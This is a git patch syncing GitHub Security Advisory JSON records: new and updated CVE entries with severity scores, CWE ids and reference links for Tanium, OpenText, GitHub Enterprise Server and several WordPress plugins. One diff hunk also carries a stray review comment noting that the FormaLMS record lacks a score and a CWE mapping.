From 2a4cc40b8c72319cdbd2ace8dbc2bf6c059f8ba7 Mon Sep 17 00:00:00 2001 
From: "advisory-database[bot]" <45398580+advisory-database[bot]@users.noreply.github.com> Date: Fri, 20 Feb 2026 00:33:18 +0000 Subject: [PATCH 01/77] Advisory Database Sync --- .../GHSA-22jr-f6pc-522x.json | 36 +++++++++++++++++++ .../GHSA-2q3j-wj77-9934.json | 6 +++- .../GHSA-36vc-76hh-jxcp.json | 36 +++++++++++++++++++ .../GHSA-3h3m-wx6r-9g3v.json | 11 ++++-- .../GHSA-4234-jpgj-67fv.json | 11 ++++-- .../GHSA-4jmq-69hm-3jp3.json | 36 +++++++++++++++++++ .../GHSA-528q-f4x8-fm57.json | 11 ++++-- .../GHSA-558g-hvr5-cchr.json | 36 +++++++++++++++++++ .../GHSA-5h6j-gr7x-5qpg.json | 11 ++++-- .../GHSA-5jm3-f2cq-hw7c.json | 36 +++++++++++++++++++ .../GHSA-739q-666p-vgj7.json | 11 ++++-- .../GHSA-742g-xjv2-hvh9.json | 33 +++++++++++++++++ .../GHSA-89gr-885m-3hc3.json | 11 ++++-- .../GHSA-8g63-rx6r-ghfc.json | 36 +++++++++++++++++++ .../GHSA-92wf-6p4m-jhgj.json | 11 ++++-- .../GHSA-97jx-r35c-g98x.json | 11 ++++-- .../GHSA-cppf-28gj-rgc8.json | 11 ++++-- .../GHSA-fg7c-375r-xggv.json | 36 +++++++++++++++++++ .../GHSA-fj3r-hwrr-xqfr.json | 36 +++++++++++++++++++ .../GHSA-fqr4-q363-g7gm.json | 36 +++++++++++++++++++ .../GHSA-fv8p-2x46-62xh.json | 11 ++++-- .../GHSA-fw5x-26p7-22pv.json | 11 ++++-- .../GHSA-g6g2-qr88-w8qf.json | 11 ++++-- .../GHSA-hm7p-gwh2-3jfm.json | 11 ++++-- .../GHSA-jwh4-2xr6-36qf.json | 11 ++++-- .../GHSA-m5w7-8p57-p7r3.json | 11 ++++-- .../GHSA-p546-7whm-cxpm.json | 6 +++- .../GHSA-pmfh-36xp-5j94.json | 11 ++++-- .../GHSA-qrj7-4954-7p6v.json | 6 +++- .../GHSA-r4m5-gc42-8vvh.json | 36 +++++++++++++++++++ .../GHSA-r7pc-wm4g-53rv.json | 15 +++++--- .../GHSA-rx38-cw65-cmwp.json | 36 +++++++++++++++++++ .../GHSA-w9fg-2h32-5478.json | 36 +++++++++++++++++++ .../GHSA-xfv7-f3m9-5h58.json | 11 ++++-- .../GHSA-xgvq-3q42-wr4g.json | 11 ++++-- .../GHSA-xmxf-f859-45ch.json | 11 ++++-- .../GHSA-xprw-mh67-9xf5.json | 11 ++++-- 37 files changed, 651 insertions(+), 67 deletions(-) create mode 100644 
advisories/unreviewed/2026/02/GHSA-22jr-f6pc-522x/GHSA-22jr-f6pc-522x.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-36vc-76hh-jxcp/GHSA-36vc-76hh-jxcp.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-4jmq-69hm-3jp3/GHSA-4jmq-69hm-3jp3.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-558g-hvr5-cchr/GHSA-558g-hvr5-cchr.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-5jm3-f2cq-hw7c/GHSA-5jm3-f2cq-hw7c.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-742g-xjv2-hvh9/GHSA-742g-xjv2-hvh9.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-8g63-rx6r-ghfc/GHSA-8g63-rx6r-ghfc.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-fg7c-375r-xggv/GHSA-fg7c-375r-xggv.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-fj3r-hwrr-xqfr/GHSA-fj3r-hwrr-xqfr.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-fqr4-q363-g7gm/GHSA-fqr4-q363-g7gm.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-r4m5-gc42-8vvh/GHSA-r4m5-gc42-8vvh.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-rx38-cw65-cmwp/GHSA-rx38-cw65-cmwp.json
create mode 100644 advisories/unreviewed/2026/02/GHSA-w9fg-2h32-5478/GHSA-w9fg-2h32-5478.json
diff --git a/advisories/unreviewed/2026/02/GHSA-22jr-f6pc-522x/GHSA-22jr-f6pc-522x.json b/advisories/unreviewed/2026/02/GHSA-22jr-f6pc-522x/GHSA-22jr-f6pc-522x.json
new file mode 100644
index 0000000000000..4c31d34c7fb4c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-22jr-f6pc-522x/GHSA-22jr-f6pc-522x.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-22jr-f6pc-522x",
+ "modified": "2026-02-20T00:31:53Z",
+ "published": "2026-02-20T00:31:53Z",
+ "aliases": [
+ "CVE-2026-1292"
+ ],
+ "details": "Tanium addressed an insertion of sensitive information into log file vulnerability in Trends.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1292"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.tanium.com/TAN-2026-007"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-532"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T00:16:14Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json b/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json
index adb0dfcf2a0b1..5386a87228f86 100644
--- a/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json
+++ b/advisories/unreviewed/2026/02/GHSA-2q3j-wj77-9934/GHSA-2q3j-wj77-9934.json
@@ -1,13 +1,17 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-2q3j-wj77-9934",
- "modified": "2026-02-18T21:31:23Z",
+ "modified": "2026-02-20T00:31:52Z",
 "published": "2026-02-18T21:31:23Z",
 "aliases": [
 "CVE-2026-1355"
 ],
 "details": "A Missing Authorization vulnerability was identified in GitHub Enterprise Server that allowed an attacker to upload unauthorized content to another user’s repository migration export due to a missing authorization check in the repository migration upload endpoint. By supplying the migration identifier, an attacker could overwrite or replace a victim’s migration archive, potentially causing victims to download attacker-controlled repository data during migration restores or automated imports. An attacker would require authentication to the victim's GitHub Enterprise Server instance. This vulnerability affected all versions of GitHub Enterprise Server prior to 3.20 and was fixed in versions 3.19.2, 3.18.5, 3.17.11, 3.16.14, 3.15.18, 3.14.23. This vulnerability was reported via the GitHub Bug Bounty program.",
 "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"
+ },
 {
 "type": "CVSS_V4",
 "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:L/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"
diff --git a/advisories/unreviewed/2026/02/GHSA-36vc-76hh-jxcp/GHSA-36vc-76hh-jxcp.json b/advisories/unreviewed/2026/02/GHSA-36vc-76hh-jxcp/GHSA-36vc-76hh-jxcp.json
new file mode 100644
index 0000000000000..e9137edbd2504
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-36vc-76hh-jxcp/GHSA-36vc-76hh-jxcp.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-36vc-76hh-jxcp",
+ "modified": "2026-02-20T00:31:53Z",
+ "published": "2026-02-20T00:31:53Z",
+ "aliases": [
+ "CVE-2026-1658"
+ ],
+ "details": "User Interface (UI) Misrepresentation of Critical Information vulnerability in OpenText™ Directory Services allows Cache Poisoning. \n\nThe vulnerability could be exploited by a bad actor to inject manipulated text into the OpenText application, potentially misleading users.\n\nThis issue affects Directory Services: from 20.4.1 through 25.2.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:P/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:N/R:A/V:D/RE:L/U:Clear"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-1658"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0858517"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-451"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-19T23:16:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-3h3m-wx6r-9g3v/GHSA-3h3m-wx6r-9g3v.json b/advisories/unreviewed/2026/02/GHSA-3h3m-wx6r-9g3v/GHSA-3h3m-wx6r-9g3v.json
index 70038f50d0867..988303a975c70 100644
--- a/advisories/unreviewed/2026/02/GHSA-3h3m-wx6r-9g3v/GHSA-3h3m-wx6r-9g3v.json
+++ b/advisories/unreviewed/2026/02/GHSA-3h3m-wx6r-9g3v/GHSA-3h3m-wx6r-9g3v.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-3h3m-wx6r-9g3v",
- "modified": "2026-02-19T21:30:48Z",
+ "modified": "2026-02-20T00:31:52Z",
 "published": "2026-02-19T21:30:48Z",
 "aliases": [
 "CVE-2026-27328"
 ],
 "details": "Missing Authorization vulnerability in DevsBlink EduBlink edublink allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects EduBlink: from n/a through <= 2.0.7.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T21:18:32Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-4234-jpgj-67fv/GHSA-4234-jpgj-67fv.json b/advisories/unreviewed/2026/02/GHSA-4234-jpgj-67fv/GHSA-4234-jpgj-67fv.json
index c434d7eba07df..8d6e4eed5dad6 100644
--- a/advisories/unreviewed/2026/02/GHSA-4234-jpgj-67fv/GHSA-4234-jpgj-67fv.json
+++ b/advisories/unreviewed/2026/02/GHSA-4234-jpgj-67fv/GHSA-4234-jpgj-67fv.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-4234-jpgj-67fv",
- "modified": "2026-02-19T18:31:52Z",
+ "modified": "2026-02-20T00:31:52Z",
 "published": "2026-02-19T18:31:52Z",
 "aliases": [
 "CVE-2026-25308"
 ],
 "details": "Missing Authorization vulnerability in wp.insider Simple Membership simple-membership allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Simple Membership: from n/a through <= 4.6.9.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:15Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-4jmq-69hm-3jp3/GHSA-4jmq-69hm-3jp3.json b/advisories/unreviewed/2026/02/GHSA-4jmq-69hm-3jp3/GHSA-4jmq-69hm-3jp3.json
new file mode 100644
index 0000000000000..a1cb479e0df9d
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-4jmq-69hm-3jp3/GHSA-4jmq-69hm-3jp3.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-4jmq-69hm-3jp3",
+ "modified": "2026-02-20T00:31:53Z",
+ "published": "2026-02-20T00:31:53Z",
+ "aliases": [
+ "CVE-2026-2408"
+ ],
+ "details": "Tanium addressed a use-after-free vulnerability in the Cloud Workloads Enforce client extension.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2408"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.tanium.com/TAN-2026-005"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-416"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T00:16:17Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-528q-f4x8-fm57/GHSA-528q-f4x8-fm57.json b/advisories/unreviewed/2026/02/GHSA-528q-f4x8-fm57/GHSA-528q-f4x8-fm57.json
index 873cc91128052..d0334973f3783 100644
--- a/advisories/unreviewed/2026/02/GHSA-528q-f4x8-fm57/GHSA-528q-f4x8-fm57.json
+++ b/advisories/unreviewed/2026/02/GHSA-528q-f4x8-fm57/GHSA-528q-f4x8-fm57.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-528q-f4x8-fm57",
- "modified": "2026-02-19T18:31:52Z",
+ "modified": "2026-02-20T00:31:52Z",
 "published": "2026-02-19T18:31:52Z",
 "aliases": [
 "CVE-2026-25336"
 ],
 "details": "Missing Authorization vulnerability in wpcoachify Coachify coachify allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Coachify: from n/a through <= 1.1.5.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:18Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-558g-hvr5-cchr/GHSA-558g-hvr5-cchr.json b/advisories/unreviewed/2026/02/GHSA-558g-hvr5-cchr/GHSA-558g-hvr5-cchr.json
new file mode 100644
index 0000000000000..af53f25f383bf
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-558g-hvr5-cchr/GHSA-558g-hvr5-cchr.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-558g-hvr5-cchr",
+ "modified": "2026-02-20T00:31:53Z",
+ "published": "2026-02-20T00:31:53Z",
+ "aliases": [
+ "CVE-2025-13672"
+ ],
+ "details": "Improper Neutralization of Input During Web Page Generation (XSS or 'Cross-site Scripting') vulnerability in OpenText™ Web Site Management Server allows Reflected XSS. The vulnerability could allow injecting malicious JavaScript inside URL parameters that was then rendered with the preview of the page, so that malicious scripts could be executed on the client side.\n\nThis issue affects Web Site Management Server: 16.7.0, 16.7.1.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:P/VC:H/VI:L/VA:N/SC:H/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:P/AU:N/R:U/V:D/RE:H/U:Red"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-13672"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.opentext.com/csm/en?id=ot_kb_unauthenticated&sysparm_article=KB0854847"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-79"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-19T23:16:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-5h6j-gr7x-5qpg/GHSA-5h6j-gr7x-5qpg.json b/advisories/unreviewed/2026/02/GHSA-5h6j-gr7x-5qpg/GHSA-5h6j-gr7x-5qpg.json
index d9be9a459db0a..0597b2114d570 100644
--- a/advisories/unreviewed/2026/02/GHSA-5h6j-gr7x-5qpg/GHSA-5h6j-gr7x-5qpg.json
+++ b/advisories/unreviewed/2026/02/GHSA-5h6j-gr7x-5qpg/GHSA-5h6j-gr7x-5qpg.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-5h6j-gr7x-5qpg",
- "modified": "2026-02-19T18:31:51Z",
+ "modified": "2026-02-20T00:31:52Z",
 "published": "2026-02-19T18:31:51Z",
 "aliases": [
 "CVE-2026-23542"
 ],
 "details": "Deserialization of Untrusted Data vulnerability in ThemeGoods Grand Restaurant grandrestaurant allows Object Injection.This issue affects Grand Restaurant: from n/a through <= 7.0.10.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-502"
 ],
- "severity": null,
+ "severity": "CRITICAL",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:12Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-5jm3-f2cq-hw7c/GHSA-5jm3-f2cq-hw7c.json b/advisories/unreviewed/2026/02/GHSA-5jm3-f2cq-hw7c/GHSA-5jm3-f2cq-hw7c.json
new file mode 100644
index 0000000000000..a7ae0edcf9f4c
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-5jm3-f2cq-hw7c/GHSA-5jm3-f2cq-hw7c.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-5jm3-f2cq-hw7c",
+ "modified": "2026-02-20T00:31:53Z",
+ "published": "2026-02-20T00:31:53Z",
+ "aliases": [
+ "CVE-2025-8054"
+ ],
+ "details": "Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal') vulnerability in OpenText™ XM Fax allows Path Traversal. \n\nThe vulnerability could allow an attacker to arbitrarily disclose content of files on the local filesystem. This issue affects XM Fax: 24.2.",
+ "severity": [
+ {
+ "type": "CVSS_V4",
+ "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:N/AU:Y/R:A/V:D/RE:M/U:Amber"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-8054"
+ },
+ {
+ "type": "WEB",
+ "url": "https://support.opentext.com/csm?id=ot_kb_unauthenticated&sysparm_article=KB0847038"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-22"
+ ],
+ "severity": "HIGH",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-19T23:16:15Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-739q-666p-vgj7/GHSA-739q-666p-vgj7.json b/advisories/unreviewed/2026/02/GHSA-739q-666p-vgj7/GHSA-739q-666p-vgj7.json
index 676362a75d411..0053dcc0aafaf 100644
--- a/advisories/unreviewed/2026/02/GHSA-739q-666p-vgj7/GHSA-739q-666p-vgj7.json
+++ b/advisories/unreviewed/2026/02/GHSA-739q-666p-vgj7/GHSA-739q-666p-vgj7.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-739q-666p-vgj7",
- "modified": "2026-02-19T18:31:51Z",
+ "modified": "2026-02-20T00:31:52Z",
 "published": "2026-02-19T18:31:51Z",
 "aliases": [
 "CVE-2026-24999"
 ],
 "details": "Missing Authorization vulnerability in Alma Alma alma-gateway-for-woocommerce allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Alma: from n/a through <= 5.16.1.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:13Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-742g-xjv2-hvh9/GHSA-742g-xjv2-hvh9.json b/advisories/unreviewed/2026/02/GHSA-742g-xjv2-hvh9/GHSA-742g-xjv2-hvh9.json
new file mode 100644
index 0000000000000..ef44e4ad807c2
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-742g-xjv2-hvh9/GHSA-742g-xjv2-hvh9.json
@@ -0,0 +1,33 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-742g-xjv2-hvh9",
+ "modified": "2026-02-20T00:31:53Z",
+ "published": "2026-02-20T00:31:53Z",
+ "aliases": [
+ "CVE-2026-26744"
+ ],
+ "details": "A user enumeration vulnerability exists in FormaLMS 4.1.18 and below in the password recovery functionality accessible via the /lostpwd endpoint. The application returns different error messages for valid and invalid usernames allowing an unauthenticated attacker to determine which usernames are registered in the system through observable response discrepancy.",
+ "severity": [],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-26744"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/formalms/formalms.git"
+ },
+ {
+ "type": "WEB",
+ "url": "https://github.com/lorenzobruno7/CVE-2026-26744"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [],
+ "severity": null,
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-19T22:16:47Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-89gr-885m-3hc3/GHSA-89gr-885m-3hc3.json b/advisories/unreviewed/2026/02/GHSA-89gr-885m-3hc3/GHSA-89gr-885m-3hc3.json
index 5522b3c451000..c51ef9f930192 100644
--- a/advisories/unreviewed/2026/02/GHSA-89gr-885m-3hc3/GHSA-89gr-885m-3hc3.json
+++ b/advisories/unreviewed/2026/02/GHSA-89gr-885m-3hc3/GHSA-89gr-885m-3hc3.json
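Review bot: The new record GHSA-742g-xjv2-hvh9.json carries no score and no weakness class (`"severity": []`, `"cwe_ids": []`, `"severity": null`), so any consumer that filters or prioritises on those fields will treat this user-enumeration issue as unrated rather than low or moderate. The `details` text describes different error messages for valid and invalid usernames, which appears to match CWE-204 (Observable Response Discrepancy); if the upstream record gains that mapping, `"cwe_ids": ["CWE-204"]` would be the expected value here. Of the two WEB references, `https://github.com/formalms/formalms.git` is a clone URL rather than a page about the issue and the other is a third-party repository, so the record links no vendor advisory or fix. `"affected": []` also leaves the "4.1.18 and below" range only in free text, where version-matching tools cannot use it.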
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-89gr-885m-3hc3",
- "modified": "2026-02-19T18:31:51Z",
+ "modified": "2026-02-20T00:31:52Z",
 "published": "2026-02-19T18:31:51Z",
 "aliases": [
 "CVE-2026-24375"
 ],
 "details": "Missing Authorization vulnerability in WP Swings Ultimate Gift Cards For WooCommerce woo-gift-cards-lite allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Ultimate Gift Cards For WooCommerce: from n/a through <= 3.2.4.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:13Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-8g63-rx6r-ghfc/GHSA-8g63-rx6r-ghfc.json b/advisories/unreviewed/2026/02/GHSA-8g63-rx6r-ghfc/GHSA-8g63-rx6r-ghfc.json
new file mode 100644
index 0000000000000..43707a78c9034
--- /dev/null
+++ b/advisories/unreviewed/2026/02/GHSA-8g63-rx6r-ghfc/GHSA-8g63-rx6r-ghfc.json
@@ -0,0 +1,36 @@
+{
+ "schema_version": "1.4.0",
+ "id": "GHSA-8g63-rx6r-ghfc",
+ "modified": "2026-02-20T00:31:53Z",
+ "published": "2026-02-20T00:31:53Z",
+ "aliases": [
+ "CVE-2026-2605"
+ ],
+ "details": "Tanium addressed an insertion of sensitive information into log file vulnerability in TanOS.",
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
+ }
+ ],
+ "affected": [],
+ "references": [
+ {
+ "type": "ADVISORY",
+ "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-2605"
+ },
+ {
+ "type": "WEB",
+ "url": "https://security.tanium.com/TAN-2026-006"
+ }
+ ],
+ "database_specific": {
+ "cwe_ids": [
+ "CWE-532"
+ ],
+ "severity": "MODERATE",
+ "github_reviewed": false,
+ "github_reviewed_at": null,
+ "nvd_published_at": "2026-02-20T00:16:18Z"
+ }
+}
\ No newline at end of file
diff --git a/advisories/unreviewed/2026/02/GHSA-92wf-6p4m-jhgj/GHSA-92wf-6p4m-jhgj.json b/advisories/unreviewed/2026/02/GHSA-92wf-6p4m-jhgj/GHSA-92wf-6p4m-jhgj.json
index 7dedd46bb9a7c..0ca84acd5fe6e 100644
--- a/advisories/unreviewed/2026/02/GHSA-92wf-6p4m-jhgj/GHSA-92wf-6p4m-jhgj.json
+++ b/advisories/unreviewed/2026/02/GHSA-92wf-6p4m-jhgj/GHSA-92wf-6p4m-jhgj.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-92wf-6p4m-jhgj",
- "modified": "2026-02-19T18:31:51Z",
+ "modified": "2026-02-20T00:31:52Z",
 "published": "2026-02-19T18:31:51Z",
 "aliases": [
 "CVE-2026-24392"
 ],
 "details": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Nabil Lemsieh HurryTimer hurrytimer allows Stored XSS.This issue affects HurryTimer: from n/a through <= 2.14.2.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:L"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-79"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
 "nvd_published_at": "2026-02-19T09:16:13Z"
diff --git a/advisories/unreviewed/2026/02/GHSA-97jx-r35c-g98x/GHSA-97jx-r35c-g98x.json b/advisories/unreviewed/2026/02/GHSA-97jx-r35c-g98x/GHSA-97jx-r35c-g98x.json
index 25fdcbe7e49a0..4e7499586a2ff 100644
--- a/advisories/unreviewed/2026/02/GHSA-97jx-r35c-g98x/GHSA-97jx-r35c-g98x.json
+++ b/advisories/unreviewed/2026/02/GHSA-97jx-r35c-g98x/GHSA-97jx-r35c-g98x.json
@@ -1,13 +1,18 @@
 {
 "schema_version": "1.4.0",
 "id": "GHSA-97jx-r35c-g98x",
- "modified": "2026-02-19T18:31:52Z",
+ "modified": "2026-02-20T00:31:52Z",
 "published": "2026-02-19T18:31:52Z",
 "aliases": [
 "CVE-2026-25338"
 ],
 "details": "Missing Authorization vulnerability in Ays Pro AI ChatBot with ChatGPT and Content Generator by AYS ays-chatgpt-assistant allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects AI ChatBot with ChatGPT and Content Generator by AYS: from n/a through <= 2.7.4.",
- "severity": [],
+ "severity": [
+ {
+ "type": "CVSS_V3",
+ "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"
+ }
+ ],
 "affected": [],
 "references": [
 {
@@ -23,7 +28,7 @@
 "cwe_ids": [
 "CWE-862"
 ],
- "severity": null,
+ "severity": "MODERATE",
 "github_reviewed": false,
 "github_reviewed_at": null,
